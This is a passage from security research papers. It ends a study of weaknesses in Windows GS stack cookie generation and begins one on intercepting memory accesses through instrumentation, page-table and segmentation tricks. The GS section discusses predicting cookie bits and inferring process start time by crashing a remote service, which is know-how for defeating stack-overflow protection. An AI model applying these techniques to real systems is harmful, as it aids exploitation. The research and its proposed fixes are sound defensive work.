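The fallback arrangement described above can be sketched as follows. This is a toy model, not Microsoft's implementation: query_kernel_cookie is a hypothetical stand-in for a kernel-mode cookie interface, and the local entropy mix is deliberately simplified.

```python
# Toy model of a backward-compatible GS cookie initializer: prefer a
# kernel-supplied cookie when the interface exists, otherwise fall back
# to mixing local entropy sources. All names here are hypothetical.
import os
import time

def query_kernel_cookie():
    """Hypothetical kernel-mode cookie interface; None if unsupported."""
    return None  # simulate an older platform without the interface

def generate_local_cookie():
    # Simplified stand-in for the statically linked generator: XOR a few
    # time- and process-derived 32-bit values together.
    cookie = int(time.time()) & 0xFFFFFFFF
    cookie ^= os.getpid() & 0xFFFFFFFF
    cookie ^= time.perf_counter_ns() & 0xFFFFFFFF
    return cookie

def security_init_cookie():
    cookie = query_kernel_cookie()
    if cookie is None:  # kernel interface absent: fall back locally
        cookie = generate_local_cookie()
    return cookie
```

On a platform with the kernel interface, every module would receive a cookie derived from kernel-held entropy; on older platforms the behavior degrades to the local generator.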
As it turns out, Microsoft does indeed have a mechanism that could allow them
to create a patch that would affect the majority of the binaries compiled with
recent versions of GS. This functionality is provided by exposing the address
of an image file's security cookie in its load config data directory.
When the dynamic loader (ntdll) loads an image file, it checks to see if the
security cookie address in the load config data directory is non-NULL. If
it's not NULL, the loader proceeds to store the process-wide GS cookie in the
module-specific GS cookie location. In this way, the __security_init_cookie
routine that's called by the image file's entry point effectively becomes a
no-operation because the cookie will have already been initialized. This
manner of setting the GS cookie for image files provides Microsoft with much
more flexibility. Rather than having to update all binaries compiled with GS,
Microsoft can simply update a single binary (ntdll.dll) if improvements need
to be made to the cookie generation algorithm. The following output shows a
sample of dumpbin /loadconfig on kernel32.dll:
Microsoft (R) COFF/PE Dumper Version 8.00.50727.42
Copyright (C) Microsoft Corporation. All rights reserved.
Dump of file c:\windows\system32\kernel32.dll
File Type: DLL
Section contains the following load config:
00000048 size
0 time date stamp
...
7C8836CC Security Cookie
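The loader behavior described above can be modeled in a few lines. This is a simplified sketch, not ntdll's actual code: the Image class and its fields are invented stand-ins for the PE load config data, and the cookie values are arbitrary.

```python
# Toy model of the loader path described above: if an image's load config
# directory carries a non-NULL security cookie address, the loader seeds
# that location with the process-wide cookie, which makes the image's own
# __security_init_cookie stub effectively a no-operation.

PROCESS_WIDE_COOKIE = 0xBB40E64E  # arbitrary example value

class Image:
    def __init__(self, cookie_address):
        self.cookie_address = cookie_address  # from load config directory
        self.memory = {}                      # address -> value

def loader_map_image(image):
    if image.cookie_address:  # non-NULL: loader initializes the cookie
        image.memory[image.cookie_address] = PROCESS_WIDE_COOKIE

def security_init_cookie(image):
    # The statically linked stub skips generation when the cookie has
    # already been initialized by the loader.
    if image.memory.get(image.cookie_address):
        return
    image.memory[image.cookie_address] = 0xDEADBEEF  # locally generated

new_image = Image(cookie_address=0x7C8836CC)  # address as in the dump above
loader_map_image(new_image)
security_init_cookie(new_image)
```

Because the cookie location is reached through a single indirection, updating the generation algorithm only requires patching the loader, exactly as the text argues.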
7) Future Work
There is still additional work that can be done to further refine the
techniques described in this document. This chapter outlines some of the
major items that could be followed up on.
7.1) Improving Performance Counter Estimates
One area in particular that the author feels could benefit from further
research has to do with refining the technique used to calculate the
performance counter. A more thorough analysis of the apparent association
between time and the lower 17 bits of the performance counter is necessary.
This analysis would directly affect the ability to recover more cookie state
information, since the entropy of the lower 17 bits of the performance counter
is one of the only things standing in the way of obtaining the entire cookie.
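A quick bit of arithmetic shows why those 17 bits are the crux. Assuming every other entropy source can be calculated or inferred, the attacker's search space collapses from the full 32-bit cookie to just the unresolved performance counter bits:

```python
# Residual search space if only the low 17 bits of the performance
# counter remain unknown, versus brute-forcing a full 32-bit cookie.
residual_guesses = 2 ** 17          # unresolved performance counter bits
full_guesses = 2 ** 32              # a completely unpredictable cookie
reduction_factor = full_guesses // residual_guesses
```

That is a reduction by a factor of 2^15, which is why refining the performance counter estimate is singled out as the highest-value piece of future work.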
7.2) Remote Attacks
The ability to apply the techniques described in this document in a remote
scenario would obviously increase the severity of the problem. In order to do
this, an attacker would need the ability to either infer or be able to
calculate some of the key elements that are used in the generation of a
cookie. This would rely on being able to determine things like the process
creation time, the process and thread identifier, and the system uptime. With
these values, it should be possible to predict the state of the cookie with
similar degrees of accuracy. Of course, methods of obtaining this information
remotely are not obvious.
One point of consideration that should be made is that even if it's not
possible to directly determine some of this information, it may be possible to
infer it. For instance, consider a scenario where a vulnerability in a
service is exposed remotely. There's nothing to stop an attacker from causing
the service to crash. In most cases, the service will restart at some
predefined point (such as 30 seconds after the crash). Using this approach,
an attacker could infer the creation time of the process based on the time
that the crash was generated. This isn't foolproof, but it should be
possible to get fairly close.
Determining the process and thread identifiers could be tricky, especially if the
system has been up for some time. The author is not aware of a general
purpose technique that could be used to determine this information remotely.
Fortunately, the process and thread identifiers have very little effect on high
order bits.
The system uptime is an interesting one. In the past, there have been
techniques that could be used to estimate the uptime of the system through the
use of TCP timestamps and other network protocol anomalies. At the time of
this writing, the author is not aware of how prevalent or useful these
techniques are against modern operating systems. Should they still be
effective, they would represent a particularly useful way of obtaining a
system's uptime. If an attacker can obtain both the creation time of the
process and the uptime of the system, it's possible to calculate the tick
count and performance counter values with varying degrees of accuracy.
The performance counter will still pose a great challenge in the remote
scenario. The performance frequency, at least, shouldn't be treated as an
unknown quantity. As far as the author is aware, the performance frequency on
modern processors is generally 3579545, though there may be certain power
situations that would cause it to be different.
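Under those assumptions, the conversion from an inferred uptime to counter values is straightforward. This is a rough estimate only: it assumes the tick count advances in milliseconds of uptime and that the performance counter runs at the nominal 3,579,545 Hz frequency cited above, ignoring rounding to timer granularity.

```python
# Rough remote estimate of tick count and performance counter values
# from an inferred system uptime, under the stated assumptions.
PERF_FREQUENCY = 3579545  # nominal counts per second, per the text

def estimate_counters(uptime_seconds):
    tick_count = int(uptime_seconds * 1000)            # milliseconds
    perf_counter = int(uptime_seconds * PERF_FREQUENCY)
    return tick_count, perf_counter

ticks, perf = estimate_counters(3600)  # e.g. one hour of uptime
```

The error in such an estimate grows with the uncertainty in the uptime measurement, which is why the low-order performance counter bits remain the hardest part to recover remotely.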
It is also important to note that the current attack assumes that the load
time for an image that has a GS cookie is equivalent to the initial thread's
creation time. For example, if a DLL were loaded much later in process
execution, such as through instantiating a COM object in Internet Explorer, it
would not be possible to assume that initial thread creation time is equal to
the system time that was obtained when the DLL's GS cookie was generated.
This brings about an interesting point for the remote scenario, however. If
an attacker can control the time at which a DLL is loaded, it may be possible
for them to infer the value of system time that is used without even having to
directly query it. One example of this would be in the context of internet
explorer, where the client's date and time functionality might be abused to
obtain this information.
8) Conclusion
The ability to reduce the amount of effective entropy in a GS cookie can
improve an attacker's chances of guessing the cookie. This paper has
described two techniques that may be used to calculate or infer the values of
certain bits in a GS cookie. The first approach involves a local attacker's
ability to collect information that makes it possible to calculate, with
pretty good accuracy, the values of the entropy sources that were used at the
time that a cookie was generated. The second approach describes the potential
for abusing the limited entropy associated with boot start services.
While the results shown in this paper do not represent a complete break of GS,
they do hint toward a general weakness in the way that GS cookies are
generated. This is particularly serious given the fact that GS is a compile
time solution. If the techniques described in this document are refined, or
new and improved techniques are identified, a complete break of GS would
require the recompilation of all affected binaries. The implications of this
should be obvious. The ability to reliably predict the value of a GS cookie
would effectively nullify any benefits that GS adds. It would mean that all
stack-based buffer overflows would immediately become exploitable.
To help contribute to the improvement of GS, a few different solutions were
described that could either partially or wholly address some of the weaknesses
that were identified. The most interesting of these solutions involves
modifying the GS implementation to make use of an external cookie generator,
such as the kernel. Going this route would ensure that any weaknesses found
in the cookie generation algorithm could be simply addressed through a patch
to the kernel. This is much more reasonable than expecting all existing GS
enabled binaries to be recompiled.
It's unclear whether the techniques presented in this paper will have any
appreciable effect on future exploits. Only time will tell.
References
[1] Cowan, Crispin et al. StackGuard: Automatic Adaptive Detection and Prevention of Buffer-Overflow Attacks.
http://www.usenix.org/publications/library/proceedings/sec98/full_papers/cowan/cowan_html/cowan.html; accessed 3/18/2007.
[2] Etoh, Hiroaki. GCC extension for protecting applications from stack-smashing attacks.
http://www.research.ibm.com/trl/projects/security/ssp/; accessed 3/18/2007.
[3] eEye. Memory Retrieval Vulnerabilities.
http://research.eeye.com/html/Papers/download/eeyeMRV-Oct2006.pdf; accessed 3/18/2007.
[4] Litchfield, David. Defeating the Stack Based Buffer Overflow Prevention Mechanism of Microsoft Windows 2003 Server.
http://www.nextgenss.com/papers/defeating-w2k3-stack-protection.pdf; accessed 3/18/2007.
[5] Microsoft Corporation. /GS (Buffer Security Check).
http://msdn2.microsoft.com/en-us/library/8dbf701c(VS.80).aspx; accessed 3/18/2007.
[6] Microsoft Corporation. /SAFESEH (Image has Safe Exception Handlers).
http://msdn2.microsoft.com/en-us/library/9a89h429(VS.80).aspx; accessed 3/18/2007.
[7] Microsoft Corporation. QueryPerformanceFrequency Function.
http://msdn2.microsoft.com/en-us/library/ms644905.aspx; accessed 3/18/2007.
[8] Microsoft Corporation. QueryPerformanceCounter Function.
http://msdn2.microsoft.com/en-us/library/ms644904.aspx; accessed 3/18/2007.
[9] Ren, Chris et al. Microsoft Compiler Flaw Technical Note.
http://www.cigital.com/news/index.php?pg=art&artid=70; accessed 3/18/2007.
[10] Whitehouse, Ollie. Analysis of GS protections in Windows Vista.
http://www.symantec.com/avcenter/reference/GS_Protections_in_Vista.pdf; accessed 3/20/2007.

Memalyze: Dynamic Analysis of Memory Access Behavior in Software
skape
mmiller@hick.org
4/2007
Abstract
This paper describes strategies for dynamically analyzing an application's
memory access behavior. These strategies make it possible to detect when a
read or write is about to occur at a given location in memory while an
application is executing. An application's memory access behavior can provide
additional insight into its behavior. For example, it may be able to provide
an idea of how data propagates throughout the address space. Three individual
strategies which can be used to intercept memory accesses are described in
this paper. Each strategy makes use of a unique method of intercepting memory
accesses. These methods include the use of Dynamic Binary Instrumentation
(DBI), x86 hardware paging features, and x86 segmentation features. A
detailed description of the design and implementation of these strategies for
32-bit versions of Windows is given. Potential uses for these analysis
techniques are described in detail.
1) Introduction
If software analysis had a holy grail, it would more than likely be centered
around the ability to accurately model the data flow behavior of an
application. After all, applications aren't really much more than
sophisticated data processors that operate on varying sets of input to produce
varying sets of output. Describing how an application behaves when it
encounters these varying sets of input makes it possible to predict future
behavior. Furthermore, it can provide insight into how the input could be
altered to cause the application to behave differently. Given these benefits,
it's only natural that a discipline exists that is devoted to the study of
data flow analysis.
There are two general approaches that can be taken to perform data flow
analysis. The first approach is referred to as static analysis and it
involves analyzing an application's source code or compiled binaries without
actually executing the application. The second approach is dynamic analysis
which, as one would expect, involves analyzing the data flow of an application
as it executes. The two approaches have both shared and unique benefits, and
no argument will be made in this paper as to which may be better or worse.
Instead, this paper will focus on describing three strategies that may be used
to assist in the process of dynamic data flow analysis.
The first strategy involves using Dynamic Binary Instrumentation (DBI) to
rewrite the instruction stream of the executing application in a manner that
makes it possible to intercept instructions that read from or write to memory.
Two well-known examples of DBI implementations that the author is familiar
with are DynamoRIO and Valgrind[3, 11]. The second strategy that will be
discussed involves using the hardware paging features of the x86 and x64
architectures to trap and handle access to specific pages in memory. Finally,
the third strategy makes use of the segmentation features included in the x86
architecture to trap memory accesses by making use of the null selector.
Though these three strategies vary greatly, they all accomplish the same goal
of being able to intercept memory accesses within an application as it
executes.
The ability to intercept memory reads and writes during runtime can support
research in additional areas relating to dynamic data flow analysis. For
example, the ability to track what areas of code are reading from and writing
to memory could make it possible to build a model for the data propagation
behaviors of an application. Furthermore, it might be possible to show with
what degree of code-level isolation different areas of memory are accessed.
Indeed, it may also be possible to attempt to validate the data consistency
model of a threaded application by investigating the access behaviors of
various regions of memory which are referenced by multiple threads. These are
but a few of the many potential candidates for dynamic data flow analysis.
This paper is organized into three sections. Section 2 gives an introduction
to three different strategies for facilitating dynamic data flow analysis.
Section 3 enumerates some of the potential scenarios in which these strategies
could be applied in order to render some useful information about the data
flow behavior of an application. Finally, section 4 describes some of the
previous work whose concepts have been used as the basis for the research
described herein.
2) Strategies
This section describes three strategies that can be used to intercept runtime
memory accesses. The strategies described herein do not rely on any static
binary analysis. Techniques that do make use of static binary analysis are
outside of the scope of this paper.
2.1) Dynamic Binary Instrumentation
Dynamic Binary Instrumentation (DBI) is a method of analyzing the behavior of
a binary application at runtime through the injection of instrumentation code.
This instrumentation code executes as part of the normal instruction stream
after being injected. In most cases, the instrumentation code will be
entirely transparent to the application that it's been injected into. Analyzing
an application at runtime makes it possible to gain insight into the behavior
and state of an application at various points in execution. This highlights
one of the key differences between static binary analysis and dynamic binary
analysis. Rather than considering what may occur, dynamic binary analysis has
the benefit of operating on what actually does occur. This is by no means
exhaustive in terms of exercising all code paths in the application, but it
makes up for this by providing detailed insight into an application's concrete
execution state.
The benefits of DBI have made it possible to develop some incredibly advanced
tools. Examples where DBI might be used include runtime profiling,
visualization, and optimization tools. DBI implementations generally fall
into two categories: light-weight or heavy-weight. A light-weight DBI
operates on the architecture-specific instruction stream and state when
performing analysis. A heavy-weight DBI operates on an abstract form of the
instruction stream and state. An example of a heavy-weight DBI is Valgrind which
performs analysis on an intermediate representation of the machine state[11,
7]. An example of a light-weight DBI is DynamoRIO which performs analysis
using the architecture-specific state[3]. The benefit of a heavy-weight DBI
over a light-weight DBI is that analysis code written against the intermediate
representation is immediately portable to other architectures, whereas
light-weight DBI analysis implementations must be fine-tuned to work with
individual architectures. While Valgrind is a novel and interesting
implementation, it is currently not supported on Windows. For this reason,
attention will be given to DynamoRIO for the remainder of this paper. There are
many additional DBI frameworks and details, but for the sake of limiting scope
these will not be discussed. The reader should consult reference material to
learn more about this subject[11].
DynamoRIO is an example of a DBI framework that allows custom instrumentation
code to be integrated in the form of dynamic libraries. The tool itself is a
combination of Dynamo, a dynamic optimization engine developed by researchers
at HP, and RIO, a runtime introspection and optimization engine developed by
MIT. The fine-grained details of the implementation of DynamoRIO are outside
of the scope of this paper, but it's important to understand the basic
concepts[2].
At a high-level, figure 1 from Transparent Binary Optimization provides a
great visualization of the process employed by Dynamo[2]. In concrete terms,
Dynamo works by processing an instruction stream as it executes. To
accomplish this, Dynamo assumes responsibility for the execution of the
instruction stream. It uses a disassembler to identify the point of the next
branch instruction in the code that is about to be executed. The set of
instructions disassembled is referred to as a fragment (although it's more
commonly known as a basic block). If the target of the branch instruction is
in Dynamo's fragment cache, it executes the (potentially optimized) code in
the fragment cache. When this code completes, it returns control to Dynamo to
disassemble the next fragment. If at some point Dynamo encounters a branch
target that is not in its fragment cache, it will add it to the fragment cache
and potentially optimize it. This is the perfect opportunity for
instrumentation code to be injected into the optimized fragment that is
generated for a branch target. Injecting instrumentation code at this level
is entirely transparent to the application. While this is an
oversimplification of the process used by DynamoRIO, it should at least give
some insight into how it functions.
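The dispatch loop described above can be captured in a short sketch. This is a toy model, not DynamoRIO: a "program" here is just a dict mapping branch targets to (instructions, next-target) pairs, and the optimization step is omitted.

```python
# Toy model of Dynamo's fragment cache: on a cache miss the engine
# "disassembles" up to the next branch, inserts the fragment into the
# cache, then executes from the cache; on a hit it executes directly.

program = {
    0x1000: (["mov", "cmp", "jz"], 0x2000),  # (instructions, next target)
    0x2000: (["add", "ret"], None),
}

fragment_cache = {}
trace = []  # record of build and execute events, for illustration

def run(target):
    while target is not None:
        if target not in fragment_cache:
            # Cache miss: build (and potentially optimize) the fragment.
            fragment_cache[target] = program[target]
            trace.append(("build", target))
        instrs, next_target = fragment_cache[target]
        trace.append(("exec", target))
        target = next_target

run(0x1000)
```

Running the same code path a second time executes entirely from the cache, which is where instrumentation inserted at fragment-build time pays for itself.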
One of the best features of DynamoRIO from an analysis standpoint is that it
provides a framework for inserting instrumentation code during the time that a
fragment is being inserted into the fragment cache. This is especially useful
for the purposes of intercepting memory accesses within an application. When
a fragment is being created, DynamoRIO provides analysis libraries with the
instructions that are to be included in the fragment that is generated. To
optimize for performance, DynamoRIO provides multiple levels of disassembly
information. At the most optimized level, only very basic information
about the instructions is provided. At the least optimized level, very
detailed information about the instructions and their operands can be
obtained. Analysis libraries are free to control the level of information
that they retrieve. Using this knowledge of DynamoRIO, it is now possible
to consider how one might design an analysis library that is able to
intercept memory reads and writes while an application is executing.
2.1.1) Design
DBI, and DynamoRIO in particular, make designing a solution that can intercept
memory reads and writes fairly trivial. The basic design involves having an
analysis library that scans the instructions within a fragment that is being
created. When an instruction that accesses memory is encountered,
instrumentation code can be inserted prior to the instruction. The
instrumentation code can be composed of instructions that notify an
instrumentation function of the memory operand that is about to be read from
or written to. This has the effect of causing the instrumentation function to
be called when the fragment is executed. These few steps are really all that
it takes to instrument the memory access behavior of an application as it
executes using DynamoRIO.
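The instrumentation pass itself reduces to a simple transformation over the fragment's instruction list. The sketch below is language-neutral pseudocode in Python, not DynamoRIO's C API: instructions are modeled as (mnemonic, operands) tuples, bracketed operands denote memory references, and the callback name is hypothetical.

```python
# Sketch of the design described above: scan a fragment and insert a
# call to an instrumentation routine before every instruction that
# reads from or writes to memory.

def accesses_memory(instr):
    _, operands = instr
    return any(op.startswith("[") for op in operands)

def instrument_fragment(instrs, callback_name="on_memory_access"):
    out = []
    for instr in instrs:
        if accesses_memory(instr):
            # Notify the instrumentation routine of the memory operand
            # that is about to be referenced.
            mem_ops = [op for op in instr[1] if op.startswith("[")]
            out.append(("call", (callback_name, mem_ops[0])))
        out.append(instr)
    return out

fragment = [("mov", ["eax", "[ebx+4]"]),
            ("add", ["eax", "1"]),
            ("mov", ["[ecx]", "eax"])]
instrumented = instrument_fragment(fragment)
```

In the real implementation, the inserted call would be built with helpers like INSTR_CREATE_add and placed with instrlist_meta_preinsert, as described in the next section.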
2.1.2) Implementation
The implementation of the DBI approach is really just as easy as the design
description makes it sound. To cooperate with DynamoRIO, an analysis library
must implement a well-defined routine named dynamorio_basic_block which is
called by DynamoRIO when a fragment is being created. This routine is passed
an instruction list which contains the set of instructions taken from the
native binary. Using this instruction list, the analysis library can make a
determination as to whether or not any of the operands of an instruction
either explicitly or implicitly reference memory. If an instruction does
access memory, then instrumentation code must be inserted.
Inserting instrumentation code with DynamoRIO is a pretty painless process.
DynamoRIO provides a number of macros that encapsulate the process of creating
and inserting instructions into the instruction list. For example,
INSTR_CREATE_add will create an add instruction with a specific set of arguments
and instrlist_meta_preinsert will insert an instruction prior to another
instruction within the instruction list.
A proof of concept implementation is included with the source code provided
along with this paper.
2.1.3) Considerations
This approach is particularly elegant thanks to the concepts of dynamic binary
instrumentation and to DynamoRIO itself for providing an elegant framework
that supports inserting instrumentation code into the fragment cache. Since
DynamoRIO is explicitly designed to be a runtime optimization engine, the fact
that the instrumentation code is cached within the fragment cache means that
it gains the benefits of DynamoRIO's fragment optimization algorithms. When
compared to alternative approaches, this approach also has significantly less
overhead once the fragment cache begins to become populated. This is because
all of the instrumentation code is placed entirely inline with the application
code that is executing rather than having to rely on alternative means of
interrupting the normal course of program execution. Still, this approach is
not without its set of considerations. Some of these considerations are
described below:
1. Requires the use of a disassembler
DynamoRIO depends on its own internal disassembler. This can be a source
of problems and limitations.
2. Self-modifying and dynamic code
Self-modifying and dynamically generated code can potentially cause problems
with DynamoRIO.
3. DynamoRIO is closed source
While this has nothing to do with the actual concept, the fact that
DynamoRIO is closed source can be limiting in the event that there are
issues with DynamoRIO itself.
2.2) Page Access Interception
The hardware paging features of the x86 and x64 architectures represent a
potentially useful means of obtaining information about the memory access
behavior of an application. This is especially true due to the well-defined
actions that the processor takes when a reference is made to a linear address
whose physical page is either not present or has had its access restricted.
In these cases, the processor will assert the page fault interrupt (0x0E) and
thereby force the operating system to attempt to gracefully handle the virtual
memory reference. In Windows, the page fault interrupt is handled by
nt!KiTrap0E. In most cases, nt!KiTrap0E will issue a call into
nt!MmAccessFault which is responsible for making a determination about the
nature of the memory reference that occurred. If the memory reference fault
was a result of an access restriction, nt!MmAccessFault will return an access
violation error code (0xC0000005). When an access violation occurs, an
exception record is generated by the kernel and is then passed to either the
user-mode exception dispatcher or the kernel-mode exception dispatcher
depending on which mode the memory access occurred in. The job of the
exception dispatcher is to give a thread an opportunity to gracefully recover
from the exception. This is accomplished by providing each of the registered
or vectored exception handlers with the exception information that was
collected when the page fault occurred. If an exception handler is able to
recover, execution of the thread can simply restart where it left off. Using
the principles outlined above, it is possible to design a system that is
capable of both trapping and handling memory references to specific pages in
memory during the course of normal process execution.
2.2.1) Design
The first step that must be taken to implement this system involves
identifying a method that can be used to trap references to arbitrary pages in
memory. Fortunately, previous work has done much to identify some of the
different approaches that can be taken to accomplish this[8, 4]. For the purposes
of this paper, one of the most useful approaches centers around the ability to
define whether or not a page is restricted from user-mode access. This is
controlled by the Owner bit in a linear address' page table entry (PTE)[5]. When
the Owner bit is set to 0, the page can only be accessed at privilege level 0.
This effectively restricts access to kernel-mode in all modern operating
systems. Likewise, when the Owner bit is set to 1, the page can be accessed
from all privilege levels. By toggling the Owner bit to 0 in the PTEs
associated with a given set of linear addresses, it is possible to trap all
user-mode references to those addresses at runtime. This effectively solves
the first hurdle in implementing a solution to intercept memory access
behavior.
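At the bit level, the manipulation is a single mask operation. In Intel's manuals the Owner bit is called the User/Supervisor bit and occupies bit 2 of a page table entry; the sketch below models a PTE as a plain integer rather than touching real page tables.

```python
# Bit-level sketch of the PTE change described above: clearing the
# Owner (User/Supervisor) bit restricts the page to privilege level 0.
PTE_PRESENT  = 1 << 0
PTE_WRITABLE = 1 << 1
PTE_OWNER    = 1 << 2   # 1 = user-accessible, 0 = kernel-only

def restrict_to_kernel(pte):
    return pte & ~PTE_OWNER

def is_user_accessible(pte):
    return bool(pte & PTE_OWNER)

pte = PTE_PRESENT | PTE_WRITABLE | PTE_OWNER  # a normal user-mode PTE
restricted = restrict_to_kernel(pte)
```

Note that only the Owner bit changes; the page remains present and writable, so kernel-mode code (and the page fault path) continues to see a valid mapping.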
Using the approach outlined above, any reference that is made from user-mode
to a linear address whose PTE has had the Owner bit set to 0 will result in an
access violation exception being passed to the user-mode exception dispatcher.
This exception must be handled by a custom exception handler that is able to
distinguish transient access violations from ones that occurred as a result of
the Owner bit having been modified. This custom exception handler must also
be able to recover from the exception in a manner that allows execution to
resume seamlessly. Distinguishing exceptions is easy if one assumes that the
custom exception handler has knowledge in advance of the address regions that
have had their Owner bit modified. Given this assumption, the act of
distinguishing exceptions is as simple as seeing if the fault address is
within an address region that is currently being monitored. While
distinguishing exceptions may be easy, being able to gracefully recover is an
entirely different matter.
To recover and resume execution with no noticeable impact to an application
means that the exception handler must have a mechanism that allows the
application to access the data stored in the pages whose virtual mappings have
had their access restricted to kernel-mode. This, of course, would imply that
the application must have some way, either direct or indirect, to access the
contents of the physical pages associated with the virtual mappings that have
had their PTEs modified. The most obvious approach would be to simply toggle
the Owner bit to permit user-mode access. This has many different problems,
not the least of which being that doing so would be expensive and would not
behave properly in multi-threaded environments (memory accesses could be
missed or worse). An alternative to updating the Owner bit would be to have a
device driver designed to provide support to processes that would allow them
to read the contents of a virtual address at privilege level 0. However,
having the ability to read and write memory through a driver means nothing if
the results of the operation cannot be factored back into the instruction that
triggered the exception.
Rather than attempting to emulate the read and write access, a better approach
can be used. This approach involves creating a second virtual mapping to the
same set of physical pages described by the linear addresses whose PTEs were
modified. This second virtual mapping would behave like a typical user-mode
memory mapping. In this way, the process' virtual address space would contain
two virtual mappings to the same set of physical pages. One mapping, which
will be referred to as the original mapping, would represent the user-mode
inaccessible set of virtual addresses. The second mapping, which will be
referred to as the mirrored mapping, would be the user-mode accessible set of
virtual addresses. By mapping the same set of physical pages at two
locations, it is possible to transparently redirect address references at the
time that exceptions occur. An important thing to note is that in order to
provide support for mirroring, a disassembler must be used to figure out which
registers need to be modified.
To better understand how this could work, consider a scenario where an
application contains a mov [eax], 0x1 instruction. For the purposes of this
example, assume that the eax register contains an address that is within the
original mapping as described above. When this instruction executes, it will
lead to an access violation exception being generated as a result of the PTE
modifications that were made to the original mapping. When the exception
handler inspects this exception, it can determine that the fault address was
one that is contained within the original mapping. To allow execution to
resume, the exception handler must update the eax register to point to the
equivalent address within the mirrored region. Once it has altered the value
of eax, the exception handler can tell the exception dispatcher to continue
execution with the now-modified register information. From the perspective of
an executing application, this entire operation will occur transparently.
Unfortunately, there's still more work that needs to be done in order to
ensure that the application continues to execute properly after the exception
dispatcher continues execution.
The biggest problem with modifying the value of a register to point to the
mirrored address is that it can unintentionally alter the behavior of
subsequent instructions. For example, the application may not function
properly if it assumes that it can access other non-mirrored memory addresses
relative to the address stored within eax. Not only that, but allowing eax to
continue to be accessed through the mirrored address will mean that subsequent
reads and writes to memory made using the eax register will be missed for the
time that eax contains the mirrored address.
In order to solve this problem, it is necessary to come up with a method of
restoring registers to their original value after the instruction executes.
Fortunately, the underlying architecture has built-in support that allows a
program to be notified after it has executed an instruction. This support is
known as single-stepping. To make use of single-stepping, the exception
handler can set the trap flag (0x100) in the saved value of the eflags
register. When execution resumes, the processor will generate a single step
exception after the original instruction executes. This will result in the
custom exception handler being called. When this occurs, the custom exception
handler can determine if the single step exception occurred as a result of a
previous mirroring operation. If it was the result of a mirroring operation,
the exception handler can take steps to restore the appropriate register to
its original value.
Using these four primary steps, a complete solution to the problem of
intercepting memory accesses can be formed. First, the Owner bit of the PTEs
associated with a region of virtual memory can be set to 0. This will cause
user-mode references to this region to generate an access violation exception.
Second, an additional mapping to the set of physical pages described by the
original mapping can be created which is accessible from user-mode. Third,
any access violation exceptions that reach the custom exception handler can be
inspected. If they are the result of a reference to a region that is being
tracked, the register contents of the thread context can be adjusted to
reference the user-accessible mirrored mapping. The thread can then be
single-stepped so that the fourth and final step can be taken. When a
single-step exception is generated, the custom exception handler can restore
the original value of the register that was modified. When this is complete,
the thread can be allowed to continue as if nothing had happened.
2.2.2) Implementation
An implementation of this approach is included with the source code released
along with this paper. This implementation has two main components: a
kernel-mode driver and a user-mode DLL. The kernel-mode driver provides a
device object interface that allows a user-mode process to create a mirrored
mapping of a set of physical pages and to toggle the Owner bit of PTEs
associated with address regions. The user-mode DLL is responsible for
implementing a vectored exception handler that takes care of processing access
violation exceptions by mirroring the address references to the appropriate
mirrored region. The user-mode DLL also exposes an API that allows
applications to create a memory mirror. This abstracts the entire process and
makes it simple to begin tracking a specific memory region. The API also
allows applications to register callbacks that are notified when an address
reference occurs. This allows further analysis of the memory access behavior
of the application.
2.2.3) Considerations
While this approach is most definitely functional, it comes with a number of
caveats that make it sub-optimal for any sort of large-scale deployment. The
following considerations are by no means all-encompassing, but some of the
more important ones have been enumerated below:
1. Unsafe modification of PTEs
It is not safe to modify PTEs without acquiring certain locks.
Unfortunately, these locks are not exported and are therefore inaccessible
to third party drivers.
2. Large amount of overhead
The overhead associated with having to take a page fault and pass the
exception on to be handled by user-mode is substantial. Memory access
time with respect to the application could jump from nanoseconds to
microseconds or even milliseconds.
3. Requires the use of a disassembler
Since this approach relies on mirroring memory references from one virtual
address to another, a disassembler has to be used to figure out which
registers need to be modified with the mirrored address. Any time a
disassembler is needed is an indication that things are getting fairly
complicated.
4. Cannot track memory references to all addresses
The fact that this approach relies on locking physical pages prevents it
from feasibly tracking all memory references. In addition, because the
thread stack is required to be valid in order to dispatch exceptions, it's
not possible to track reads and writes to thread stacks using this
approach.
2.3) Null Segment Interception
Segmentation is an extremely old feature of the x86 architecture. Its purpose
has been to provide software with the ability to partition the address space
into distinct segments that can be referenced through a 16-bit segment
selector. Segment selectors are used to index either the Global Descriptor
Table (GDT) or the Local Descriptor Table (LDT). Segment descriptors convey
information about all or a portion of the address space. On modern 32-bit
operating systems, segmentation is used merely to set up a flat memory model
(retained primarily because there is no way to disable it). This is further
illustrated by the fact that the x64 architecture has effectively done away
with the ES, DS, and SS segment registers in 64-bit mode. While segment
selectors are primarily intended to make it possible to access memory, they
can also be used to prevent access to it.
2.3.1) Design
Segmentation is one of the easiest ways to trap memory accesses. The majority
of instructions which reference memory implicitly use either the DS or ES
segment registers to do so. The one exception to this rule is the set of instructions
that deal with the stack. These instructions implicitly use the SS segment
register. There are a few different ways one can go about causing a general
protection fault when accessing an address relative to a segment selector, but
one of the easiest is to take advantage of the null selector. The null
selector, 0x0, is a special segment selector that will always cause a general
protection fault when using it to reference memory. By loading the null
selector into DS, for example, the mov [eax], 0x1 instruction would cause a
general protection fault when executed. Using the null selector solves the
problem of being able to intercept memory accesses, but there still needs to
be some mechanism to allow the application to execute normally after
intercepting the memory access.
When a general protection fault occurs in user-mode, the kernel generates an
access violation exception and passes it off to the user-mode exception
dispatcher in much the same way as was described in 2.2. Registering a custom
exception handler makes it possible to catch this exception and handle it
gracefully. To handle this exception, the custom exception handler must
restore DS and ES segment registers to valid segment selectors by updating the
thread context record associated with the exception. On 32-bit versions of
Windows, the segment registers should be restored to 0x23. Once the
segment registers have been updated, the exception dispatcher can be told to
continue execution. However, before this happens, there is an additional step
that must be taken.
It is not enough to simply restore the segment registers and then continue
execution. This would lead to subsequent reads and writes being missed as a
result of the DS and ES segment registers no longer pointing to the null
selector. To address this, the custom exception handler should toggle the
trap flag in the context record prior to continuing execution. Setting the
trap flag will cause the processor to generate a single step exception after
the instruction that generated the general protection fault executes. This
single step exception can then be processed by the custom exception handler to
reset the DS and ES segment registers to the null selector. After the segment
registers have been updated, the trap flag can be disabled and execution can
be allowed to continue. By following these steps, the application is able to
make forward progress while also making it possible to trap all memory reads
and writes that use the DS and ES segment registers.
2.3.2) Implementation
The implementation for this approach involves registering a vectored exception
handler that is able to handle the access violation and single step exceptions
that are generated. Since this approach relies on setting the segment
registers DS and ES to the null selector, an implementation must take steps to
update the segment register state for each running thread in a process and for
all new threads as they are created. Updating the segment register state for
running threads involves enumerating running threads in the calling process
using the toolhelp library. For each thread that is not the calling thread,
the SetThreadContext routine can be used to update segment registers. The
calling thread can update the segment registers using native instructions. To
